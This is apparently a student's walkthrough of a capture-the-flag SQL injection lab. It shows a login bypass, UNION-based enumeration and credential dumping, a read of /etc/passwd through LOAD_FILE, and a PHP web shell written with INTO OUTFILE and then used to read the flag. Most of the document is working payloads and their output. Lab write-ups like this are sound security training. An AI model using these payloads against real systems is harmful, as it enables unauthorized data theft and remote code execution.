SQL INJECTION

OBJECTIVE: Perform a full assessment of the web application from a "grey box" approach, checking for the existence of SQL injection vulnerabilities

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer
#testing & authentication bypass
root@oco:~$ BROWSER > http://94.237.63.224:40530/
 username field: ' OR 1=1 LIMIT 1-- -'
 * ALT: ' OR 1=1-- -'
 * ALT: ' OR 1=1-- -
    - Anything after the -- - becomes a comment; the trailing single quote in -- -' is
      just part of that comment and has no special meaning
  password field: unknown
 * the password field isn't important as it will be ignored by the comment
 * SQL: SELECT * FROM users WHERE username='username' AND password='password';
 * SQLI: SELECT * FROM users WHERE username='' OR 1=1 LIMIT 1-- -' AND password='password';
 * SQLI: SELECT * FROM users WHERE username='' OR 1=1-- AND password='password';
 
#identify table columns: UNION METHOD
this method returns an error on every attempt until the column count matches the original query
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,2-- -
 * The used SELECT statements have a different number of columns
 input field: ' UNION SELECT 1,2,3-- -
 * The used SELECT statements have a different number of columns
 input field: ' UNION SELECT 1,2,3,4-- -
 * The used SELECT statements have a different number of columns
 input field: ' UNION SELECT 1,2,3,4,5-- -

#enumeration: identify DBs
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,schema_name,3,4,5 FROM INFORMATION_SCHEMA.SCHEMATA-- -
 * ilfreight 	3 	4 	5
   backup 	3 	4 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
#enumeration: identify DB used by the web server
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,database(),3,4,5-- -
 * ilfreight 	3 	4 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
 #enumeration: identify all tables within the ilfreight DB
 root@oco:~$ BROWSER > {targetSite:port}
  input field: ' UNION SELECT 1,TABLE_NAME,TABLE_SCHEMA,4,5 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='backup'-- -
  * admin_bk 	backup 	4 	5
  payload: ' UNION SELECT 1,2,3,4,5-- -
  
  input field: ' UNION SELECT 1,TABLE_NAME,TABLE_SCHEMA,4,5 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='ilfreight'-- -
  * payment 	ilfreight 	4 	5
    users 	ilfreight 	4 	5
  payload: ' UNION SELECT 1,2,3,4,5-- -
 
#enumeration: identify the column names of the tables found in the ilfreight & backup DBs
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA,5 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_bk'-- -
 * username 	admin_bk 	backup 	5
   password 	admin_bk 	backup 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
 input field: ' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA,5 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='payment'-- -
 * id   	payment 	ilfreight 	5
   name 	payment 	ilfreight 	5
   month 	payment 	ilfreight 	5
   amount 	payment 	ilfreight 	5
   tax  	payment 	ilfreight 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
 input field: ' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA,5 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users'-- -
 * id   	users 	ilfreight 	5
   username 	users 	ilfreight 	5
   password 	users 	ilfreight 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -

#dump table data
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, username, password, 4, 5 FROM backup.admin_bk-- -
 * admin 	Inl@n3_fre1gh7_adm!n 	4 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -

 input field: ' UNION SELECT 1, username, password, 4, 5 FROM ilfreight.users-- -
 * adam 	1be9f5d3a82847b8acca40544f953515 	4 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
#identify DB Version
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,@@version,3,4,5-- -
 * 10.3.22-MariaDB-1ubuntu1 	3 	4 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
#identify db user
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,user(),3,4,5-- -
 * root@localhost 	3 	4 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
#identify DB user file privileges
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,super_priv,3,4,5 FROM mysql.user-- -
 * Y 	3 	4 	5
    - Y means the user has superuser privileges
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
#identify reading/writing file locations
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,variable_name,variable_value,4,5 FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -
 * SECURE_FILE_PRIV 		4 	5
    - the result shows that the secure_file_priv value is empty, meaning MySQL places no restriction on where files can be read from or written to (OS file permissions still apply)
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
#identify write access
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,'file written successfully!',3,4,5 INTO OUTFILE '/var/www/html/proof.txt'-- -
 * Can't create/write to file '/var/www/html/proof.txt' (Errcode: 13 "Permission denied")
 input field: ' UNION SELECT 1,'file written successfully!',3,4,5 INTO OUTFILE '/tmp/proof.txt'-- -
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
#read file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,LOAD_FILE("/tmp/proof.txt"),3,4,5-- -
 * 1 Adam January 1337$ 5% 2 James March 1213$ 8% 1 file written successfully! 3 4 5 	3 	4 	5
 payload: ' UNION SELECT 1,2,3,4,5-- -
 
 input field: ' UNION SELECT 1,LOAD_FILE("/etc/passwd"),3,4,5-- -
 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin postgres:x:101:103:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false 
 payload: ' UNION SELECT 1,2,3,4,5-- -

#write web shell to the back-end for easy execution
#note: MySQL doesn't have xp_cmdshell, which allows execution of arbitrary system commands
#xp_cmdshell is only implemented in MS SQL Server
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT "",'<?php system($_REQUEST[0]); ?>',"","","" INTO OUTFILE '/var/www/html/dashboard/w-shell.php'-- -
 * you should have noticed that the webpage is being served from http://.../dashboard/dashboard.php
    - the /dashboard directory is therefore a sensible place to store the web shell
 
#access w-shell and gather
root@oco:~$ BROWSER > http://94.237.63.224:57903/dashboard/w-shell.php?0=id
 uid=33(www-data) gid=33(www-data) groups=33(www-data) 
root@oco:~$ BROWSER > http://94.237.63.224:57903/dashboard/w-shell.php?0=ls%20../../../../
 bin boot dev etc flag_cae1dadcd174.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var 
root@oco:~$ BROWSER > http://94.237.63.224:57903/dashboard/w-shell.php?0=cat%20../../../../flag_cae1dadcd174.txt
 528d6d9cedc2c7aab146ef226e918396
